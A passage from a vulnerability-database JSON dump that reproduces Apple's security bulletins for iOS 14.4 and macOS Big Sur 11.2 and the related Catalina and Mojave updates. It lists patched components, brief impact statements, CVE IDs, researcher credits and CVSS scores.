360 Vulcan Team\n\nEntry added February 1, 2021, updated May 28, 2021 \n\n**WebKit**\n\nAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)\n\nImpact: Maliciously crafted web content may violate iframe sandboxing policy\n\nDescription: This issue was addressed with improved iframe sandbox enforcement.\n\nCVE-2021-1801: Eliya Stein of Confiant\n\nEntry added February 1, 2021, updated May 28, 2021 \n\n**WebKit**\n\nAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)\n\nImpact: A remote attacker may be able to cause arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited.\n\nDescription: A logic issue was addressed with improved restrictions.\n\nCVE-2021-1871: an anonymous researcher\n\nCVE-2021-1870: an anonymous researcher\n\nEntry updated May 28, 2021 \n\n**WebRTC**\n\nAvailable for: iPhone 6s and later, iPad Pro (all models) iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)\n\nImpact: A malicious website may be able to access restricted ports on arbitrary servers\n\nDescription: A port redirection issue was addressed with additional port validation.\n\nCVE-2021-1799: Gregory Vishnepolsky & Ben Seri of Armis Security, and Samy Kamkar\n\nEntry added February 1, 2021, updated May 28, 2021\n\n**XNU**\n\nAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation) \n\nImpact: A malicious application may be able to execute arbitrary code with kernel privileges\n\nDescription: A type confusion issue was addressed with improved state handling.\n\nCVE-2021-30869: Apple\n\nEntry added September 23, 2021\n\n\n\n## Additional recognition\n\n**iTunes Store**\n\nWe would like to acknowledge CodeColorist of Ant-Financial Light-Year Labs for their assistance.\n\nEntry added February 1, 2021\n\n**Kernel**\n\nWe would like to acknowledge Junzhi Lu (@pwn0rz), Mickey Jin & Jesse Change of Trend Micro for their assistance.\n\nEntry added February 1, 2021\n\n**libpthread**\n\nWe would like to acknowledge CodeColorist of Ant-Financial Light-Year Labs for their assistance.\n\nEntry added February 1, 2021\n\n**Mail**\n\nWe would like to acknowledge Yi\u011fit Can YILMAZ (@yilmazcanyigit) and an anonymous researcher for their assistance.\n\nEntry added February 1, 2021\n\n**Store Demo**\n\nWe would like to acknowledge @08Tc3wBB for their assistance.\n\nEntry added February 1, 2021\n\n**WebRTC**\n\nWe would like to acknowledge Philipp Hancke for their assistance.\n\nEntry added February 1, 2021\n\n**Wi-Fi**\n\nWe would like to acknowledge an anonymous researcher for their assistance.\n\nEntry added February 1, 2021\n\nInformation about products not manufactured by Apple, or independent websites not controlled or tested by Apple, is provided without recommendation or endorsement. Apple assumes no responsibility with regard to the selection, performance, or use of third-party websites or products. Apple makes no representations regarding third-party website accuracy or reliability. [Contact the vendor](<http://support.apple.com/kb/HT2693>) for additional information.\n\nPublished Date: September 23, 2021\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-01-26T00:00:00", "type": "apple", "title": "About the security content of iOS 14.4 and iPadOS 14.4", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1737", "CVE-2021-1738", "CVE-2021-1741", "CVE-2021-1742", "CVE-2021-1743", "CVE-2021-1744", "CVE-2021-1745", "CVE-2021-1746", "CVE-2021-1747", "CVE-2021-1748", "CVE-2021-1750", "CVE-2021-1753", "CVE-2021-1754", "CVE-2021-1756", "CVE-2021-1757", "CVE-2021-1758", "CVE-2021-1759", "CVE-2021-1760", "CVE-2021-1761", "CVE-2021-1762", "CVE-2021-1763", "CVE-2021-1764", "CVE-2021-1766", "CVE-2021-1767", "CVE-2021-1768", "CVE-2021-1769", "CVE-2021-1772", "CVE-2021-1773", "CVE-2021-1774", "CVE-2021-1776", "CVE-2021-1778", "CVE-2021-1780", "CVE-2021-1781", "CVE-2021-1782", "CVE-2021-1783", "CVE-2021-1785", "CVE-2021-1786", "CVE-2021-1787", "CVE-2021-1788", "CVE-2021-1789", "CVE-2021-1791", "CVE-2021-1792", "CVE-2021-1793", "CVE-2021-1794", "CVE-2021-1795", "CVE-2021-1796", "CVE-2021-1797", "CVE-2021-1799", "CVE-2021-1801", "CVE-2021-1818", "CVE-2021-1838", "CVE-2021-1870", "CVE-2021-1871", "CVE-2021-30869"], "modified": "2021-01-26T00:00:00", "id": "APPLE:341D114D330F307514C2721DBB8BFACA", "href": "https://support.apple.com/kb/HT212146", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-19T04:41:49", "description": "## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page.\n\n\n\n## macOS Big Sur 11.2, Security Update 2021-001 Catalina, Security Update 2021-001 Mojave\n\nReleased February 1, 2021\n\n**Analytics**\n\nAvailable for: macOS Big Sur 11.0.1, macOS Catalina 10.15.7, and macOS Mojave 10.14.6\n\nImpact: A remote attacker may be able to cause a denial of service\n\nDescription: This issue was addressed with improved checks.\n\nCVE-2021-1761: Cees Elzinga\n\n**APFS**\n\nAvailable for: macOS Big Sur 11.0.1\n\nImpact: A local user may be able to read arbitrary files\n\nDescription: The issue was addressed with improved permissions logic.\n\nCVE-2021-1797: Thomas Tempelmann\n\n**CFNetwork Cache**\n\nAvailable for: macOS Catalina 10.15.7 and macOS Mojave 10.14.6\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: An integer overflow was addressed with improved input validation.\n\nCVE-2020-27945: Zhuo Liang of Qihoo 360 Vulcan Team\n\n**CoreAnimation**\n\nAvailable for: macOS Big Sur 11.0.1\n\nImpact: A malicious application could execute arbitrary code leading to compromise of user information\n\nDescription: A memory corruption issue was addressed with improved state management.\n\nCVE-2021-1760: @S0rryMybad of 360 Vulcan Team\n\n**CoreAudio**\n\nAvailable for: macOS Big Sur 11.0.1\n\nImpact: Processing maliciously crafted web content may lead to code execution\n\nDescription: An out-of-bounds write was addressed with improved input validation.\n\nCVE-2021-1747: JunDong Xie of Ant Security Light-Year Lab\n\n**CoreGraphics**\n\nAvailable for: macOS Big Sur 11.0.1, macOS Catalina 10.15.7, and macOS Mojave 10.14.6\n\nImpact: Processing a maliciously crafted font file may lead to arbitrary code execution\n\nDescription: An out-of-bounds write issue was addressed with improved bounds checking.\n\nCVE-2021-1776: Ivan Fratric of Google Project Zero\n\n**CoreMedia**\n\nAvailable for: macOS Big Sur 11.0.1\n\nImpact: Processing a maliciously crafted image may lead to arbitrary code execution\n\nDescription: An out-of-bounds read was addressed with improved input validation.\n\nCVE-2021-1759: Hou JingYi (@hjy79425575) of Qihoo 360 CERT\n\n**CoreText**\n\nAvailable for: macOS Big Sur 11.0.1, macOS Catalina 10.15.7, and macOS Mojave 10.14.6\n\nImpact: Processing a maliciously crafted text file may lead to arbitrary code execution\n\nDescription: A stack overflow was addressed with improved input validation.\n\nCVE-2021-1772: Mickey Jin of Trend Micro working with Trend Micro\u2019s Zero Day Initiative\n\n**CoreText**\n\nAvailable for: macOS Big Sur 11.0.1, macOS Catalina 10.15.7, and macOS Mojave 10.14.6\n\nImpact: A remote attacker may be able to cause arbitrary code execution\n\nDescription: An out-of-bounds read was addressed with improved bounds checking.\n\nCVE-2021-1792: Mickey Jin & Junzhi Lu of Trend Micro working with Trend Micro\u2019s Zero Day Initiative\n\n**Crash Reporter**\n\nAvailable for: macOS Catalina 10.15.7\n\nImpact: A remote attacker may be able to cause a denial of service\n\nDescription: This issue was addressed with improved checks.\n\nCVE-2021-1761: Cees Elzinga\n\n**Crash Reporter**\n\nAvailable for: macOS Big Sur 11.0.1, macOS Catalina 10.15.7, and macOS Mojave 10.14.6\n\nImpact: A local attacker may be able to elevate their privileges\n\nDescription: Multiple issues were addressed with improved logic.\n\nCVE-2021-1787: James Hutchins\n\n**Crash Reporter**\n\nAvailable for: macOS Big Sur 11.0.1, macOS Catalina 10.15.7, and macOS Mojave 10.14.6\n\nImpact: A local user may be able to create or modify system files\n\nDescription: A logic issue was addressed with improved state management.\n\nCVE-2021-1786: Csaba Fitzl (@theevilbit) of Offensive Security\n\n**Directory Utility**\n\nAvailable for: macOS Catalina 10.15.7\n\nImpact: A malicious application may be able to access private information\n\nDescription: A logic issue was addressed with improved state management.\n\nCVE-2020-27937: Wojciech Regu\u0142a (@_r3ggi) of SecuRing\n\n**Endpoint Security**\n\nAvailable for: macOS Catalina 10.15.7\n\nImpact: A local attacker may be able to elevate their privileges\n\nDescription: A logic issue was addressed with improved state management.\n\nCVE-2021-1802: Zhongcheng Li (@CK01) from WPS Security Response Center\n\n**FairPlay**\n\nAvailable for: macOS Big Sur 11.0.1\n\nImpact: A malicious application may be able to disclose kernel memory\n\nDescription: An out-of-bounds read issue existed that led to the disclosure of kernel memory. This was addressed with improved input validation.\n\nCVE-2021-1791: Junzhi Lu (@pwn0rz), Qi Sun & Mickey Jin of Trend Micro working with Trend Micro\u2019s Zero Day Initiative\n\n**FontParser**\n\nAvailable for: macOS Catalina 10.15.7\n\nImpact: Processing a maliciously crafted font may lead to arbitrary code execution\n\nDescription: An out-of-bounds read was addressed with improved input validation.\n\nCVE-2021-1790: Peter Nguyen Vu Hoang of STAR Labs\n\n**FontParser**\n\nAvailable for: macOS Mojave 10.14.6\n\nImpact: Processing a maliciously crafted font may lead to arbitrary code execution\n\nDescription: This issue was addressed by removing the vulnerable code.\n\nCVE-2021-1775: Mickey Jin and Qi Sun of Trend Micro\n\n**FontParser**\n\nAvailable for: macOS Mojave 10.14.6\n\nImpact: A remote attacker may be able to leak memory\n\nDescription: An out-of-bounds read was addressed with improved bounds checking.\n\nCVE-2020-29608: Xingwei Lin of Ant Security Light-Year Lab\n\n**FontParser**\n\nAvailable for: macOS Big Sur 11.0.1 and macOS Catalina 10.15.7\n\nImpact: A remote attacker may be able to cause arbitrary code execution\n\nDescription: An out-of-bounds read was addressed with improved bounds checking.\n\nCVE-2021-1758: Peter Nguyen of STAR Labs\n\n**ImageIO**\n\nAvailable for: macOS Big Sur 11.0.1\n\nImpact: Processing a maliciously crafted image may lead to arbitrary code execution\n\nDescription: An access issue was addressed with improved memory management.\n\nCVE-2021-1783: Xingwei Lin of Ant Security Light-Year Lab\n\n**ImageIO**\n\nAvailable for: macOS Big Sur 11.0.1\n\nImpact: Processing a maliciously crafted image may lead to arbitrary code execution\n\nDescription: An out-of-bounds read was addressed with improved bounds checking.\n\nCVE-2021-1741: Xingwei Lin of Ant Security Light-Year Lab\n\nCVE-2021-1743: Mickey Jin & Junzhi Lu of Trend Micro working with Trend Micro\u2019s Zero Day Initiative, Xingwei Lin of Ant Security Light-Year Lab\n\n** \nImageIO**\n\nAvailable for: macOS Big Sur 11.0.1\n\nImpact: Processing a maliciously crafted image may lead to a denial of service\n\nDescription: A logic issue was addressed with improved state management.\n\nCVE-2021-1773: Xingwei Lin of Ant Security Light-Year Lab\n\n**ImageIO**\n\nAvailable for: macOS Big Sur 11.0.1\n\nImpact: Processing a maliciously crafted image may lead to a denial of service\n\nDescription: An out-of-bounds read issue existed in the curl. This issue was addressed with improved bounds checking.\n\nCVE-2021-1778: Xingwei Lin of Ant Security Light-Year Lab\n\n**ImageIO**\n\nAvailable for: macOS Big Sur 11.0.1 and macOS Catalina 10.15.7\n\nImpact: Processing a maliciously crafted image may lead to arbitrary code execution\n\nDescription: An out-of-bounds read was addressed with improved input validation.\n\nCVE-2021-1736: Xingwei Lin of Ant Security Light-Year Lab\n\nCVE-2021-1785: Xingwei Lin of Ant Security Light-Year Lab\n\n**ImageIO**\n\nAvailable for: macOS Big Sur 11.0.1, macOS Catalina 10.15.7, and macOS Mojave 10.14.6\n\nImpact: Processing a maliciously crafted image may lead to a denial of service\n\nDescription: This issue was addressed with improved checks.\n\nCVE-2021-1766: Danny Rosseau of Carve Systems\n\n**ImageIO**\n\nAvailable for: macOS Big Sur 11.0.1 and macOS Catalina 10.15.7\n\nImpact: A remote attacker may be able to cause unexpected application termination or arbitrary code execution\n\nDescription: A logic issue was addressed with improved state management.\n\nCVE-2021-1818: Xingwei Lin from Ant-Financial Light-Year Security Lab\n\n**ImageIO**\n\nAvailable for: macOS Big Sur 11.0.1 and macOS Catalina 10.15.7\n\nImpact: Processing a maliciously crafted image may lead to arbitrary code execution\n\nDescription: This issue was addressed with improved checks.\n\nCVE-2021-1742: Xingwei Lin of Ant Security Light-Year Lab\n\nCVE-2021-1746: Mickey Jin & Qi Sun of Trend Micro, Xingwei Lin of Ant Security Light-Year Lab\n\nCVE-2021-1754: Xingwei Lin of Ant Security Light-Year Lab\n\nCVE-2021-1774: Xingwei Lin of Ant Security Light-Year Lab\n\nCVE-2021-1777: Xingwei Lin of Ant Security Light-Year Lab\n\nCVE-2021-1793: Xingwei Lin of Ant Security Light-Year Lab\n\n**ImageIO**\n\nAvailable for: macOS Big Sur 11.0.1 and macOS Catalina 10.15.7\n\nImpact: Processing a maliciously crafted image may lead to arbitrary code execution\n\nDescription: An out-of-bounds write was addressed with improved input validation.\n\nCVE-2021-1737: Xingwei Lin of Ant Security Light-Year Lab\n\nCVE-2021-1738: Lei Sun\n\nCVE-2021-1744: Xingwei Lin of Ant Security Light-Year Lab\n\n**IOKit**\n\nAvailable for: macOS Big Sur 11.0.1\n\nImpact: An application may be able to execute arbitrary code with system privileges\n\nDescription: A logic error in kext loading was addressed with improved state handling.\n\nCVE-2021-1779: Csaba Fitzl (@theevilbit) of Offensive Security\n\n**IOSkywalkFamily**\n\nAvailable for: macOS Big Sur 11.0.1\n\nImpact: A local attacker may be able to elevate their privileges\n\nDescription: An out-of-bounds read was addressed with improved bounds checking.\n\nCVE-2021-1757: Pan ZhenPeng (@Peterpan0927) of Alibaba Security, Proteas\n\n**Kernel**\n\nAvailable for: macOS Catalina 10.15.7 and macOS Mojave 10.14.6\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A logic issue existed resulting in memory corruption. This was addressed with improved state management.\n\nCVE-2020-27904: Zuozhi Fan (@pattern_F_) of Ant Group Tianqiong Security Lab\n\n**Kernel**\n\nAvailable for: macOS Big Sur 11.0.1\n\nImpact: A remote attacker may be able to cause a denial of service\n\nDescription: A use after free issue was addressed with improved memory management.\n\nCVE-2021-1764: @m00nbsd\n\n**Kernel**\n\nAvailable for: macOS Big Sur 11.0.1, macOS Catalina 10.15.7, and macOS Mojave 10.14.6\n\nImpact: A malicious application may be able to elevate privileges. Apple is aware of a report that this issue may have been actively exploited.\n\nDescription: A race condition was addressed with improved locking.\n\nCVE-2021-1782: an anonymous researcher\n\n**Kernel**\n\nAvailable for: macOS Big Sur 11.0.1, macOS Catalina 10.15.7, and macOS Mojave 10.14.6\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: Multiple issues were addressed with improved logic.\n\nCVE-2021-1750: @0xalsr\n\n**Login Window**\n\nAvailable for: macOS Big Sur 11.0.1, macOS Catalina 10.15.7, and macOS Mojave 10.14.6\n\nImpact: An attacker in a privileged network position may be able to bypass authentication policy\n\nDescription: An authentication issue was addressed with improved state management.\n\nCVE-2020-29633: Jewel Lambert of Original Spin, LLC.\n\n**Messages**\n\nAvailable for: macOS Big Sur 11.0.1, macOS Catalina 10.15.7, and macOS Mojave 10.14.6\n\nImpact: A user that is removed from an iMessage group could rejoin the group\n\nDescription: This issue was addressed with improved checks.\n\nCVE-2021-1771: Shreyas Ranganatha (@strawsnoceans)\n\n**Model I/O**\n\nAvailable for: macOS Big Sur 11.0.1\n\nImpact: Processing a maliciously crafted USD file may lead to unexpected application termination or arbitrary code execution\n\nDescription: An out-of-bounds write was addressed with improved input validation.\n\nCVE-2021-1762: Mickey Jin of Trend Micro\n\n**Model I/O**\n\nAvailable for: macOS Catalina 10.15.7\n\nImpact: Processing a maliciously crafted file may lead to heap corruption\n\nDescription: This issue was addressed with improved checks.\n\nCVE-2020-29614: ZhiWei Sun (@5n1p3r0010) from Topsec Alpha Lab\n\n**Model I/O**\n\nAvailable for: macOS Big Sur 11.0.1, macOS Catalina 10.15.7, and macOS Mojave 10.14.6\n\nImpact: Processing a maliciously crafted USD file may lead to unexpected application termination or arbitrary code execution\n\nDescription: A buffer overflow was addressed with improved bounds checking.\n\nCVE-2021-1763: Mickey Jin of Trend Micro working with Trend Micro\u2019s Zero Day Initiative\n\n**Model I/O**\n\nAvailable for: macOS Big Sur 11.0.1, macOS Catalina 10.15.7, and macOS Mojave 10.14.6\n\nImpact: Processing a maliciously crafted image may lead to heap corruption\n\nDescription: This issue was addressed with improved checks.\n\nCVE-2021-1767: Mickey Jin & Junzhi Lu of Trend Micro working with Trend Micro\u2019s Zero Day Initiative\n\n**Model I/O**\n\nAvailable for: macOS Big Sur 11.0.1, macOS Catalina 10.15.7, and macOS Mojave 10.14.6\n\nImpact: Processing a maliciously crafted USD file may lead to unexpected application termination or arbitrary code execution\n\nDescription: An out-of-bounds read was addressed with improved input validation.\n\nCVE-2021-1745: Mickey Jin & Junzhi Lu of Trend Micro working with Trend Micro\u2019s Zero Day Initiative\n\n**Model I/O**\n\nAvailable for: macOS Big Sur 11.0.1, macOS Catalina 10.15.7, and macOS Mojave 10.14.6\n\nImpact: Processing a maliciously crafted image may lead to arbitrary code execution\n\nDescription: An out-of-bounds read was addressed with improved bounds checking.\n\nCVE-2021-1753: Mickey Jin of Trend Micro working with Trend Micro\u2019s Zero Day Initiative\n\n**Model I/O**\n\nAvailable for: macOS Big Sur 11.0.1, macOS Catalina 10.15.7, and macOS Mojave 10.14.6\n\nImpact: Processing a maliciously crafted USD file may lead to unexpected application termination or arbitrary code execution\n\nDescription: An out-of-bounds read was addressed with improved bounds checking.\n\nCVE-2021-1768: Mickey Jin & Junzhi Lu of Trend Micro working with Trend Micro\u2019s Zero Day Initiative\n\n**NetFSFramework**\n\nAvailable for: macOS Big Sur 11.0.1, macOS Catalina 10.15.7, and macOS Mojave 10.14.6\n\nImpact: Mounting a maliciously crafted Samba network share may lead to arbitrary code execution\n\nDescription: A logic issue was addressed with improved state management.\n\nCVE-2021-1751: Mikko Kentt\u00e4l\u00e4 (@Turmio_) of SensorFu\n\n**OpenLDAP**\n\nAvailable for: macOS Big Sur 11.0.1, macOS Catalina 10.15.7, and macOS Mojave 10.14.6\n\nImpact: A remote attacker may be able to cause a denial of service\n\nDescription: This issue was addressed with improved checks.\n\nCVE-2020-25709\n\n**Power Management**\n\nAvailable for: macOS Mojave 10.14.6, macOS Catalina 10.15.7\n\nImpact: A malicious application may be able to elevate privileges\n\nDescription: A logic issue was addressed with improved state management.\n\nCVE-2020-27938: Tim Michaud (@TimGMichaud) of Leviathan\n\n**Screen Sharing**\n\nAvailable for: macOS Big Sur 11.0.1\n\nImpact: Multiple issues in pcre\n\nDescription: Multiple issues were addressed by updating to version 8.44.\n\nCVE-2019-20838\n\nCVE-2020-14155\n\n**SQLite**\n\nAvailable for: macOS Catalina 10.15.7\n\nImpact: Multiple issues in SQLite\n\nDescription: Multiple issues were addressed with improved checks.\n\nCVE-2020-15358\n\n**Swift**\n\nAvailable for: macOS Big Sur 11.0.1\n\nImpact: A malicious attacker with arbitrary read and write capability may be able to bypass Pointer Authentication\n\nDescription: A logic issue was addressed with improved validation.\n\nCVE-2021-1769: CodeColorist of Ant-Financial Light-Year Labs\n\n**WebKit**\n\nAvailable for: macOS Big Sur 11.0.1\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A use after free issue was addressed with improved memory management.\n\nCVE-2021-1788: Francisco Alonso (@revskills)\n\n**WebKit**\n\nAvailable for: macOS Big Sur 11.0.1\n\nImpact: Maliciously crafted web content may violate iframe sandboxing policy\n\nDescription: This issue was addressed with improved iframe sandbox enforcement.\n\nCVE-2021-1765: Eliya Stein of Confiant\n\nCVE-2021-1801: Eliya Stein of Confiant\n\n**WebKit**\n\nAvailable for: macOS Big Sur 11.0.1\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A type confusion issue was addressed with improved state handling.\n\nCVE-2021-1789: @S0rryMybad of 360 Vulcan Team\n\n**WebKit**\n\nAvailable for: macOS Big Sur 11.0.1\n\nImpact: A remote attacker may be able to cause arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited.\n\nDescription: A logic issue was addressed with improved restrictions.\n\nCVE-2021-1871: an anonymous researcher\n\nCVE-2021-1870: an anonymous researcher\n\n**WebRTC**\n\nAvailable for: macOS Big Sur 11.0.1\n\nImpact: A malicious website may be able to access restricted ports on arbitrary servers\n\nDescription: A port redirection issue was addressed with additional port validation.\n\nCVE-2021-1799: Gregory Vishnepolsky & Ben Seri of Armis Security, and Samy Kamkar\n\n\n\n## Additional recognition\n\n**Kernel**\n\nWe would like to acknowledge Junzhi Lu (@pwn0rz), Mickey Jin & Jesse Change of Trend Micro for their assistance.\n\n**libpthread**\n\nWe would like to acknowledge CodeColorist of Ant-Financial Light-Year Labs for their assistance.\n\n**Login Window**\n\nWe would like to acknowledge Jose Moises Romero-Villanueva of CrySolve for their assistance.\n\n**Mail Drafts**\n\nWe would like to acknowledge Jon Bottarini of HackerOne for their assistance.\n\n**Screen Sharing Server**\n\nWe would like to acknowledge @gorelics for their assistance.\n\n**WebRTC**\n\nWe would like to acknowledge Philipp Hancke for their assistance.\n", "edition": 3, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-02-18T06:14:03", "title": "About the security content of macOS Big Sur 11.2, Security Update 2021-001 Catalina, Security Update 2021-001 Mojave - Apple Support", "type": "apple", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1774", "CVE-2021-1736", "CVE-2021-1753", "CVE-2021-1775", "CVE-2021-1818", "CVE-2020-29614", "CVE-2021-1871", "CVE-2021-1772", "CVE-2021-1763", "CVE-2021-1778", "CVE-2021-1743", "CVE-2021-1769", "CVE-2021-1761", "CVE-2021-1762", "CVE-2021-1802", "CVE-2021-1792", "CVE-2020-14155", "CVE-2021-1757", "CVE-2021-1744", "CVE-2021-1786", "CVE-2021-1791", "CVE-2020-29633", "CVE-2021-1773", "CVE-2021-1767", "CVE-2021-1758", "CVE-2021-1777", "CVE-2021-1771", "CVE-2021-1787", "CVE-2021-1760", "CVE-2019-20838", "CVE-2021-1768", "CVE-2020-27938", "CVE-2021-1870", "CVE-2020-27904", "CVE-2021-1746", "CVE-2021-1745", "CVE-2021-1785", "CVE-2021-1759", "CVE-2021-1737", "CVE-2021-1742", "CVE-2021-1741", "CVE-2021-1747", "CVE-2021-1790", "CVE-2021-1801", "CVE-2020-29608", "CVE-2020-27945", "CVE-2021-1799", "CVE-2021-1788", "CVE-2021-1782", "CVE-2021-1766", "CVE-2021-1783", "CVE-2021-1779", "CVE-2021-1797", "CVE-2021-1738", "CVE-2020-25709", "CVE-2020-15358", "CVE-2021-1754", "CVE-2021-1765", "CVE-2021-1793", "CVE-2021-1776", "CVE-2021-1789", "CVE-2020-27937", "CVE-2021-1764", "CVE-2021-1751", "CVE-2021-1750"], "modified": "2021-02-18T06:14:03", "id": "APPLE:HT212147", "href": "https://support.apple.com/kb/HT212147", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-08T22:05:12", "description": "# About the security content of macOS Big Sur 11.2, Security Update 2021-001 Catalina, Security Update 2021-001 Mojave\n\nThis document describes the security content of macOS Big Sur 11.2, Security Update 2021-001 Catalina, Security Update 2021-001 Mojave.\n\n## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page.\n\n\n\n## macOS Big Sur 11.2, Security Update 2021-001 Catalina, Security Update 2021-001 Mojave\n\nReleased February 1, 2021\n\n**Analytics**\n\nAvailable for: macOS Big Sur 11.0.1, macOS Catalina 10.15.7, and macOS Mojave 10.14.6\n\nImpact: A remote attacker may be able to cause a denial of service\n\nDescription: This issue was addressed with improved checks.\n\nCVE-2021-1761: Cees Elzinga\n\n**APFS**\n\nAvailable for: macOS Big Sur 11.0.1\n\nImpact: A local user may be able to read arbitrary files\n\nDescription: The issue was addressed with improved permissions logic.\n\nCVE-2021-1797: Thomas Tempelmann\n\n**CFNetwork Cache**\n\nAvailable for: macOS Catalina 10.15.7 and macOS Mojave 10.14.6\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: An integer overflow was addressed with improved input validation.\n\nCVE-2020-27945: Zhuo Liang of Qihoo 360 Vulcan Team\n\n**CoreAnimation**\n\nAvailable for: macOS Big Sur 11.0.1\n\nImpact: A malicious application could execute arbitrary code leading to compromise of user information\n\nDescription: A memory corruption issue was addressed with improved state management.\n\nCVE-2021-1760: @S0rryMybad of 360 Vulcan Team\n\n**CoreAudio**\n\nAvailable for: macOS Big Sur 11.0.1\n\nImpact: Processing maliciously crafted web content may lead to code execution\n\nDescription: An out-of-bounds write was addressed with improved input validation.\n\nCVE-2021-1747: JunDong Xie of Ant Security Light-Year Lab\n\n**CoreGraphics**\n\nAvailable for: macOS Mojave 10.14.6, macOS Catalina 10.15.7, macOS Big Sur 11.0.1\n\nImpact: Processing a maliciously crafted font file may lead to arbitrary code execution\n\nDescription: An out-of-bounds write issue was addressed with improved bounds checking.\n\nCVE-2021-1776: Ivan Fratric of Google Project Zero\n\nEntry updated March 16, 2021\n\n**CoreMedia**\n\nAvailable for: macOS Big Sur 11.0.1\n\nImpact: Processing a maliciously crafted image may lead to arbitrary code execution\n\nDescription: An out-of-bounds read was addressed with improved input validation.\n\nCVE-2021-1759: Hou JingYi (@hjy79425575) of Qihoo 360 CERT\n\n**CoreText**\n\nAvailable for: macOS Mojave 10.14.6, macOS Catalina 10.15.7, macOS Big Sur 11.0.1\n\nImpact: Processing a maliciously crafted text file may lead to arbitrary code execution\n\nDescription: A stack overflow was addressed with improved input validation.\n\nCVE-2021-1772: Mickey Jin (@patch1t) of Trend Micro working with Trend Micro\u2019s Zero Day Initiative\n\nEntry updated March 16, 2021\n\n**CoreText**\n\nAvailable for: macOS Mojave 10.14.6, macOS Catalina 10.15.7, macOS Big Sur 11.0.1\n\nImpact: A remote attacker may be able to cause arbitrary code execution\n\nDescription: An out-of-bounds read was addressed with improved bounds checking.\n\nCVE-2021-1792: Mickey Jin & Junzhi Lu of Trend Micro working with Trend Micro\u2019s Zero Day Initiative\n\nEntry updated March 16, 2021\n\n**Crash Reporter**\n\nAvailable for: macOS Catalina 10.15.7\n\nImpact: A remote attacker may be able to cause a denial of service\n\nDescription: This issue was addressed with improved checks.\n\nCVE-2021-1761: Cees Elzinga\n\n**Crash Reporter**\n\nAvailable for: macOS Big Sur 11.0.1, macOS Catalina 10.15.7, and macOS Mojave 10.14.6\n\nImpact: A local attacker may be able to elevate their privileges\n\nDescription: Multiple issues were addressed with improved logic.\n\nCVE-2021-1787: James Hutchins\n\n**Crash Reporter**\n\nAvailable for: macOS Big Sur 11.0.1, macOS Catalina 10.15.7, and macOS Mojave 10.14.6\n\nImpact: A local user may be able to create or modify system files\n\nDescription: A logic issue was addressed with improved state management.\n\nCVE-2021-1786: Csaba Fitzl (@theevilbit) of Offensive Security\n\n**Directory Utility**\n\nAvailable for: macOS Catalina 10.15.7\n\nImpact: A malicious application may be able to access private information\n\nDescription: A logic issue was addressed with improved state management.\n\nCVE-2020-27937: Wojciech Regu\u0142a 